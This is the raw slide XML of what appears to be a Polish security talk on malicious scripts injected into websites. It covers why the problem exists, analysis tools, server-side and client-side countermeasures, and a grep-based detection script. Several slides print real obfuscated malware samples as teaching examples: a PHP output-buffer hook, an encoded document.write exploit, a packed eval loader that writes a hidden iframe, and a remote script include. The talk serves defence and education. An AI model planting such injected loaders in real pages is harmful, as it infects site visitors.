              <a:t>$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&amp;&amp;$GLOB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DejaVu Sans"/>
              </a:rPr>
              <a:t>['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(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DejaVu Sans"/>
              </a:rPr>
              <a:t>) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$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DejaVu Sans"/>
              </a:rPr>
              <a:t>i&gt;=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i&lt;count($s);$i++){ob_start($s[$i][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DejaVu Sans"/>
              </a:rPr>
              <a:t>]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2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DejaVu Sans"/>
              </a:rPr>
              <a:t>; ?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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="2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 fill="hold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 fill="hold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 fill="hold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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="3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 fill="hold"/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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="211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11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11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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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1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1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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="211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11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11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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="211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11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11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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="211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11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11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49400"/>
            <a:ext cx="822636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kodowanie (na szybko ;-p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360360" y="161928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noScript i alert() prawdę Ci powiedz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680000" y="3105000"/>
            <a:ext cx="1800000" cy="15750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2381400" y="32814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49400"/>
            <a:ext cx="822636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kodowanie c.d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360360" y="161928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noScrip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2160720"/>
            <a:ext cx="9144000" cy="40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49400"/>
            <a:ext cx="822636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kodowanie c.d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360360" y="161928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alert() na przykładzie Exploit.HTML.IESlice.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DejaVu Sans"/>
              </a:rPr>
              <a:t>Prz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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;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DejaVu Sans"/>
              </a:rPr>
              <a:t>document.writ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DejaVu Sans"/>
              </a:rPr>
              <a:t>(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74%3D%27%27%3B%66%6F%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%6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DejaVu Sans"/>
              </a:rPr>
              <a:t>%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2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DejaVu Sans"/>
              </a:rPr>
              <a:t>%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F%63%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%63%72%69%70%74%3E'));zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts%2A75ih%2A7%3D%7D%2A7%3E%2A%3C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DejaVu Sans"/>
              </a:rPr>
              <a:t>%7Bfw%2A75q%2A8I')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DejaVu Sans"/>
              </a:rPr>
              <a:t>P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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;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DejaVu Sans"/>
              </a:rPr>
              <a:t>aler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DejaVu Sans"/>
              </a:rPr>
              <a:t>(unescape('%3C%73%63%72%69%70%74%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74%3D%27%27%3B%66%6F%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%6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DejaVu Sans"/>
              </a:rPr>
              <a:t>%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2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DejaVu Sans"/>
              </a:rPr>
              <a:t>%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F%63%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%7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DejaVu Sans"/>
              </a:rPr>
              <a:t>%63%72%69%70%74%3E'));zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts%2A75ih%2A7%3D%7D%2A7%3E%2A%3C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DejaVu Sans"/>
              </a:rPr>
              <a:t>%7Bfw%2A75q%2A8I')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49400"/>
            <a:ext cx="822492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laczego problem istnieje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6840" y="1295280"/>
            <a:ext cx="82249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25440" indent="-325440" algn="just">
              <a:spcBef>
                <a:spcPts val="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Błędy w przeglądarkach oraz dodatkach</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440" algn="just">
              <a:spcBef>
                <a:spcPts val="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Błędy w stronach internetowych (wstrzyknięcia)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440" algn="just">
              <a:spcBef>
                <a:spcPts val="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ieświadomość i lenistwo użytkowników</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440" algn="just">
              <a:spcBef>
                <a:spcPts val="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Brak (stosowania) odpowiednich zabezpieczeń</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="0" algn="just">
              <a:spcBef>
                <a:spcPts val="99"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/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969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440" algn="just">
              <a:spcBef>
                <a:spcPts val="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Botnety</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440">
              <a:spcBef>
                <a:spcPts val="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PAM</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="325440" indent="-325440">
              <a:spcBef>
                <a:spcPts val="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(D)DoS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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49400"/>
            <a:ext cx="822636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kodowanie c.d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360360" y="161928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alert(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79640" y="2879640"/>
            <a:ext cx="5371920" cy="18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49400"/>
            <a:ext cx="822636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zeciwdziałani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360360" y="161928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Jak można się bronić o ile w ogól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W kontekści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Badacz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Po stronie serw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Po stronie klien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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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49400"/>
            <a:ext cx="822636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zeciwdziałanie (research)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360360" y="161928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Narzędzia do analizy szkodliwego oprogramowan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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://stopbadware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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://unmaskparasites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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://malzilla.sourceforge.net/index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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://wepawet.iseclab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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://virustotal.co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 (hispase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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://virusscan.jotti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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://anubis.iseclab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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://badwarebusters.org/community/subm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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://www.secureworks.com/research/tools/caffeinemonkey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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://www.google.com/safebrowsing/report_badware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49400"/>
            <a:ext cx="822636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zeciwdziałanie (research) c.d.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360360" y="161928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Zalet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Wysoki stopień wykrywalości szkodliwego oprogramowan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Wad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W większości są to rozwiązania on-line i/lub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wymagające interakcji użytkowni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Stosunkowo długi czas analizy plikó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49400"/>
            <a:ext cx="822636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zeciwdziałanie (serwer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360360" y="161928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Dostępne rozwiązan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08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08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08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ProFTPD + mod_exec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08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Pure-FTPd + uploadscrip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08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Firewalle aplikacyjne (WAF-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08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08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Systemy IDS/IP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08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Antywirus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49400"/>
            <a:ext cx="822636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zeciwdziałanie (serwer) c.d.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360360" y="161928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Zalet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Możliwość implementacji własnego rozwiązania z FTP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Blokada “wstrzyknięć” przez WAF-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Wad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WAF-y nie posiadają sygnatur dla szkodliwego oprogramowan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Antywirusy słabo rozpoznają szkodliwe oprogramowani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Systemy IDS/IPS nie posiadają sygnatur dla szkodl. oprog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Brak możliwości zabronienia wgrania na ser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zainfekowanych plikó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49400"/>
            <a:ext cx="822636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zeciwdziałanie (serwer) c.d.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360360" y="161928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Przykład własnego rozwiązania opartego n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Pure-FTPd + uploadscript + skrypt ba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Gdyby ktoś był ciekaw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Rozwiązanie stabilne, sprawdzone w środowisku produkcyjnym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(serwer i ~2000 klientów) z liczbą false positive bliską “/dev/zero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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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49400"/>
            <a:ext cx="822636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zeciwdziałanie (serwer) c.d.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360360" y="144000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DejaVu Sans"/>
              </a:rPr>
              <a:t>-- cut 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DejaVu Sans"/>
              </a:rPr>
              <a:t># "THE BEER-WARE LICENSE"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DejaVu Sans"/>
              </a:rPr>
              <a:t># &lt;filip.palian@pjwstk.edu.pl&gt; wrote this file. As long as you retain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DejaVu Sans"/>
              </a:rPr>
              <a:t># notice you can do whatever you want with this stuff. If we meet some da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DejaVu Sans"/>
              </a:rPr>
              <a:t># and you think this stuff is worth it, you can buy me a beer in return Filip Pali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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t># Finds: "foo.(cn|ru|ro)" with ifr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DejaVu Sans"/>
              </a:rPr>
              <a:t>egrep -i "*[[:print:]]\.(cn|ru|ro)"  "$1" | egrep "[[:print:]]&lt;iframe&gt;[[:print:]]" 1&gt;/dev/nul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DejaVu Sans"/>
              </a:rPr>
              <a:t>if [ $? -eq 0 ]; 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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>boo "foo.(cn|ru|ro) with iframe"; exi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DejaVu Sans"/>
              </a:rPr>
              <a:t>f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DejaVu Sans"/>
              </a:rPr>
              <a:t># Finds: "function F00(B4R)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DejaVu Sans"/>
              </a:rPr>
              <a:t>egrep -i "function [[:alnum:]]{14,}\([[:alnum:]]{14,}\)" "$1" 1&gt;/dev/nul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DejaVu Sans"/>
              </a:rPr>
              <a:t>if [ $? -eq 0 ]; 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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>boo "function F00(B4R)"; exi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DejaVu Sans"/>
              </a:rPr>
              <a:t>F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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t># Finds: everything else what's in /etc/mwdb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DejaVu Sans"/>
              </a:rPr>
              <a:t>for i in `cat $MWDB`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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>grep "$i" "$1" 1&gt;/dev/nul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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>if [ $? -eq 0 ]; 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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>boo "/etc/mwdb.txt"; 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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>f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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>-- cut 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49400"/>
            <a:ext cx="822636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zeciwdziałanie (serwer) c.d.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360360" y="161928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Zalet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Wysoki stopień wykrywalości szkodliwego oprogramowan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Wad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Stworzenie nowej sygnatury poprzedza infekc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Brak możliwości zabronienia wgrania na serwe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zainfekowanych plikó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Utrzymanie i rozwijanie rozwiązania wymag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czasu i środkó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49400"/>
            <a:ext cx="822636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zeciwdziałanie (klient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360360" y="161928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Antywirus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800360" y="2340000"/>
            <a:ext cx="5591160" cy="8859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766880" y="5754600"/>
            <a:ext cx="543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Źródło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virustotal.com/pl/analisis/f6f3ebbbd571d208b6941fe811a55b14d447cd94e1e3c0fbc5fec4a7f2d64975-126985578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1952640" y="3598920"/>
            <a:ext cx="5343480" cy="8380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60360" y="4859280"/>
            <a:ext cx="4202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Należy korzystać z antywirusów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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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 fill="hold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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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 fill="hold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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="4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 fill="hold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49400"/>
            <a:ext cx="822492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Dlaczeg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problem istnieje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295280"/>
            <a:ext cx="82249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Pieniądze</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2600"/>
            </a:br>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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Władza</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2600"/>
            </a:br>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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Polityka = (pieniądze + władza)</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2600"/>
            </a:br>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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Religia = (pieniądze + władza)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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49400"/>
            <a:ext cx="822636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zeciwdziałanie (klient) c.d.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360360" y="161928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Zalet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Dobry zaktualizowany antywirus być może nas ochr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Wad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Stosunkowo słaba wykrywalność szkodliwego oprog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Potrzeba codziennej aktualizacji bazy sygnat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Duże prawdopodobieństwo, że dobry zaktualizowan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antywirus nie wykryje zagrożen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49400"/>
            <a:ext cx="822636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zeciwdziałanie (klient) c.d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360360" y="161928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Przeglądarki internetow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Zainstalowanie dodatku “NoScript” dla FX!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Wyłączenie zbędnych opcji i pluginów, np.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Cookies (whitelist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Java ( Kurnik;-(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JavaScript (whitelist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Adobe Reader (pobrać, przeskanować, otworzyć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RealPlay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Aktualizacja oprogramowania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49400"/>
            <a:ext cx="822636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zeciwdziałanie (klient) c.d.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360360" y="161928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Zalet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Znaczne zwiększenie bezpieczeństw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Wad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Nieco utrudnione korzystanie z przeglądarki (przyzwyczajenie!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49400"/>
            <a:ext cx="822636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zyszłość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360360" y="161928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Identyfikacja szkodliwego oprogramowania jeszcze trudniejs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przez podszywanie się pod np.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Packer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Stat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Optymalizatory (IonCube, Encode, itp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49400"/>
            <a:ext cx="822636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zyszłość c.d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360360" y="161928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Pack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DejaVu Sans"/>
              </a:rPr>
              <a:t>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String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DejaVu Sans"/>
              </a:rPr>
              <a:t>{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'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DejaVu Sans"/>
              </a:rPr>
              <a:t>c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p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DejaVu Sans"/>
              </a:rPr>
              <a:t>('3.4("&lt;0%5%6%7%2%1=\\"8://%1%9%0%a%b%0%c%1%d%e%f%2\\" g=\\"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DejaVu Sans"/>
              </a:rPr>
              <a:t>:i\\"&gt;");',19,19,'69|65|6d|document|write|66|72|61|http|76|6c|73|74|2e|63|6f|style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DejaVu Sans"/>
              </a:rPr>
              <a:t>visibility|none'.split('|'),0,{}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Stat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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;!-- (C) stat666 / Main page --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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;script type="text/javascript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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;!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DejaVu Sans"/>
              </a:rPr>
              <a:t>document.writeln('&lt;'+'scr'+'ipt type="text/javascript" src="http://s1.hit.stat666.com/_'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DejaVu Sans"/>
              </a:rPr>
              <a:t>(new Date()).getTime()+'/script.js?id=1234567890"&gt;&lt;/'+'scr'+'ipt&gt;'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DejaVu Sans"/>
              </a:rPr>
              <a:t>//--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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;/scrip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49400"/>
            <a:ext cx="822636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 na to OWASP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360360" y="161928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360440" y="5040360"/>
            <a:ext cx="6380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DejaVu Sans"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Category:OWASP_Season_of_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1682640"/>
            <a:ext cx="9144000" cy="22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94760"/>
            <a:ext cx="821052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Pytania/uwagi/sugestie/opini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6840" y="1339560"/>
            <a:ext cx="821052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9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96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47240"/>
            <a:ext cx="82263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360360" y="161928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DejaVu Sans"/>
              </a:rPr>
              <a:t>Dziękuję za uwagę ;-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&lt;filip.palian@pjwstk.edu.pl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149400"/>
            <a:ext cx="822636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Kogo głównie dotyczy prob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295280"/>
            <a:ext cx="822636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725400" indent="-268200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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Użytkownicy przeglądarek internetow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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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 algn="just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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Użytkownicy kont FTP + WW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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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 algn="just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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Twórcy stron internetow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725400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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68200" algn="just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5400"/>
                <a:tab algn="l" pos="1173240"/>
                <a:tab algn="l" pos="1622520"/>
                <a:tab algn="l" pos="2071800"/>
                <a:tab algn="l" pos="2521080"/>
                <a:tab algn="l" pos="2970360"/>
                <a:tab algn="l" pos="3419640"/>
                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>Firmy hostingow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49400"/>
